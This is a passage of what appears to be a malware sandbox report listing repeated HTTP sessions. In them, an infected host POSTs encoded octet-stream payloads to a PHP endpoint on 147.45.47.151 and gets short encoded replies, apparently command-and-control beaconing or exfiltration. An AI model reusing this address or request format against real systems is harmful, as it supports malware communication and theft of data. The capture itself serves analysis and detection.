                                                                                          Data Ascii: W[_Y[YU[XWZWRVQW[]]HWUP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2/?7&W569)>7]$,735.\+(0P*1X!23Y-.\%!Z+(
                                                                                          Dec 10, 2024 07:30:03.054285049 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:03.280560017 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5e 37 39 33 10 31 0a 24 10 2f 1f 33 13 32 03 27 41 2b 22 26 14 32 28 38 06 39 22 27 50 2a 2d 39 10 29 2a 2c 54 3f 2f 27 57 25 35 21 46 0c 1d 27 00 27 28 32 14 27 03 20 00 30 59 3c 07 26 31 27 15 2b 33 01 0b 23 20 2f 5c 26 33 28 55 2f 3e 35 0f 3b 1b 3d 1c 3e 32 0b 0c 27 28 22 57 0d 12 27 52 24 20 22 02 34 0c 36 54 23 31 3c 55 29 36 30 5d 24 3e 05 1f 35 14 31 59 30 08 37 07 20 19 28 13 28 3b 0c 5c 32 3d 25 0f 24 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%^7931$/32'A+"&2(89"'P*-9)*,T?/'W%5!F''(2' 0Y<&1'+3# /\&3(U/>5;=>2'("W'R$ "46T#1<U)60]$>51Y07 ((;\2=%$ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          75192.168.2.849930147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:02.312946081 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:02.695750952 CET2512OUTData Raw: 57 5b 5f 5b 5e 5d 55 59 58 57 5a 57 52 51 51 56 5b 58 5d 46 57 55 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[_[^]UYXWZWRQQV[X]FWUP_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"%Y,]7%6%[>>3 '0U"9[(#*89!1'Z9.\%!Z+4
                                                                                          Dec 10, 2024 07:30:03.575222015 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:03.808585882 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          76192.168.2.849935147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:04.050729036 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:04.399494886 CET2512OUTData Raw: 57 51 5f 5a 5e 5a 50 5d 58 57 5a 57 52 5c 51 57 5b 5c 5d 44 57 52 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQ_Z^ZP]XWZWR\QW[\]DWRP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%/#\%!)>3Z$Y4\'W5..)8Q=;&4"0/9.\%!Z+
                                                                                          Dec 10, 2024 07:30:05.311827898 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:05.544393063 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          77192.168.2.849941147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:05.779212952 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:06.169872999 CET2512OUTData Raw: 57 5a 5f 5c 5b 5b 50 5e 58 57 5a 57 52 56 51 5d 5b 51 5d 48 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_\[[P^XWZWRVQ][Q]HWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&,/!)55%Z*3??0)# -%\++<=*4"0-.\%!Z+(
                                                                                          Dec 10, 2024 07:30:07.040911913 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:07.276443958 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          78192.168.2.849943147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:07.514744043 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:07.873151064 CET2504OUTData Raw: 57 5f 5f 5d 5e 58 55 5d 58 57 5a 57 52 55 51 50 5b 59 5d 47 57 51 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__]^XU]XWZWRUQP[Y]GWQP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^2?+ **T#%>(=/^%?0*"&(8)]5^#2'Z99.\%!Z+4
                                                                                          Dec 10, 2024 07:30:08.775341988 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:09.008654118 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          79192.168.2.849948147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:08.408587933 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1980
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:08.756890059 CET1980OUTData Raw: 52 5a 5a 5d 5e 5c 55 5e 58 57 5a 57 52 54 51 52 5b 50 5d 44 57 50 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RZZ]^\U^XWZWRTQR[P]DWPPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&<4^#*.V#&!(>' X$:3"?^ V*)X42'X9.\%!Z+
                                                                                          Dec 10, 2024 07:30:09.670428991 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:09.904508114 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 22 39 24 05 31 23 0a 1e 3b 31 06 0f 32 03 3f 08 3e 21 32 1b 27 2b 27 5f 2e 21 27 55 3e 2e 22 02 29 39 38 57 2a 3f 0e 0e 33 0f 21 46 0c 1d 24 15 27 2b 22 15 24 2d 23 59 24 3c 20 00 30 1c 15 58 29 55 24 16 34 23 30 07 33 23 3b 0e 3b 03 2e 55 2f 1c 25 1c 2b 32 32 1e 31 02 22 57 0d 12 27 16 24 20 3a 07 34 0c 0c 51 21 31 2c 56 29 35 33 05 27 58 24 01 36 29 22 02 33 22 28 5b 23 09 34 5b 28 38 22 11 24 3e 31 0b 27 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%"9$1#;12?>!2'+'_.!'U>.")98W*?3!F$'+"$-#Y$< 0X)U$4#03#;;.U/%+221"W'$ :4Q!1,V)53'X$6)"3"([#4[(8"$>1'; ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          80192.168.2.849950147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:09.262430906 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:09.621140003 CET2512OUTData Raw: 57 5d 5f 5d 5b 59 50 5c 58 57 5a 57 52 52 51 5c 5b 5c 5d 41 57 54 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W]_][YP\XWZWRRQ\[\]AWTPZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_14^4*%!5Y>>+]3??';6=[)+ Q>+!^#28:9.\%!Z+
                                                                                          Dec 10, 2024 07:30:10.522686958 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:10.756448984 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          81192.168.2.849956147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:11.048543930 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:11.397686005 CET2504OUTData Raw: 57 50 5a 59 5e 5e 55 51 58 57 5a 57 52 55 51 52 5b 5e 5d 47 57 5f 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WPZY^^UQXWZWRUQR[^]GW_P\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&#\6P5X>%?<$4 =-X(8Q+8%Y43:.\%!Z+<
                                                                                          Dec 10, 2024 07:30:12.311304092 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:12.548527002 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          82192.168.2.849961147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:12.796422958 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:13.173727036 CET2512OUTData Raw: 57 59 5a 5d 5b 59 55 5e 58 57 5a 57 52 50 51 56 5b 5c 5d 46 57 54 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WYZ][YU^XWZWRPQV[\]FWTPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%?Z \%61[)-7_3 \39'".%[);0S*:!2..\%!Z+0
                                                                                          Dec 10, 2024 07:30:14.060401917 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:14.292489052 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          83192.168.2.849967147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:14.532773972 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:14.881912947 CET2512OUTData Raw: 52 5c 5f 5d 5e 55 55 51 58 57 5a 57 52 52 51 53 5b 5b 5d 41 57 52 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_]^UUQXWZWRRQS[[]AWRP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z%< *)"&5(.Z%?#$'5=&++?=;44-.\%!Z+
                                                                                          Dec 10, 2024 07:30:15.792784929 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:16.028598070 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          84192.168.2.849969147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:15.059662104 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:15.413217068 CET2004OUTData Raw: 52 5d 5a 5e 5e 58 55 59 58 57 5a 57 52 51 51 56 5b 51 5d 46 57 5e 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]Z^^XUYXWZWRQQV[Q]FW^P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\%?(!*%!69[(>#$/'*$5&?3*86 !499.\%!Z+4
                                                                                          Dec 10, 2024 07:30:16.341362000 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:16.578779936 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 34 39 24 00 26 33 28 1f 2f 31 0e 0f 27 3e 27 41 3d 32 2e 5c 31 5e 3f 5a 2d 0c 3f 54 3e 2d 32 01 29 3a 20 55 3e 3f 2f 57 24 35 21 46 0c 1d 24 5c 30 5d 32 5e 24 2e 2f 14 24 11 0d 5a 27 31 24 04 29 30 3b 0b 21 23 3f 5b 24 30 23 09 2c 03 3a 13 38 25 00 09 2a 54 2d 0f 25 28 22 57 0d 12 27 19 31 09 39 5f 34 0b 3a 51 36 08 20 1f 28 26 38 5b 33 58 28 03 35 03 36 02 30 31 0e 5f 23 09 38 5a 2b 2b 26 10 25 3e 22 56 27 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%49$&3(/1'>'A=2.\1^?Z-?T>-2): U>?/W$5!F$\0]2^$./$Z'1$)0;!#?[$0#,:8%*T-%("W'19_4:Q6 (&8[3X(5601_#8Z++&%>"V' ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          85192.168.2.849970147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:16.272553921 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:16.632049084 CET2512OUTData Raw: 57 5c 5a 5d 5e 55 50 59 58 57 5a 57 52 53 51 53 5b 51 5d 41 57 52 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\Z]^UPYXWZWRSQS[Q]AWRPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&([ 6W!>+'/+3:$T!=-Y+/*]!!"3/9.\%!Z+<
                                                                                          Dec 10, 2024 07:30:17.529448032 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:17.764450073 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          86192.168.2.849976147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:18.073462963 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:18.428797960 CET2512OUTData Raw: 57 5d 5f 5d 5b 5f 55 5d 58 57 5a 57 52 54 51 5d 5b 58 5d 43 57 54 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W]_][_U]XWZWRTQ][X]CWTPZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]1Y+4-56)>X40<'3$R .-)($V>%Y 2X-9.\%!Z+
                                                                                          Dec 10, 2024 07:30:19.342299938 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:19.576662064 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          87192.168.2.849982147.45.47.15180
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:30:19.812114954 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
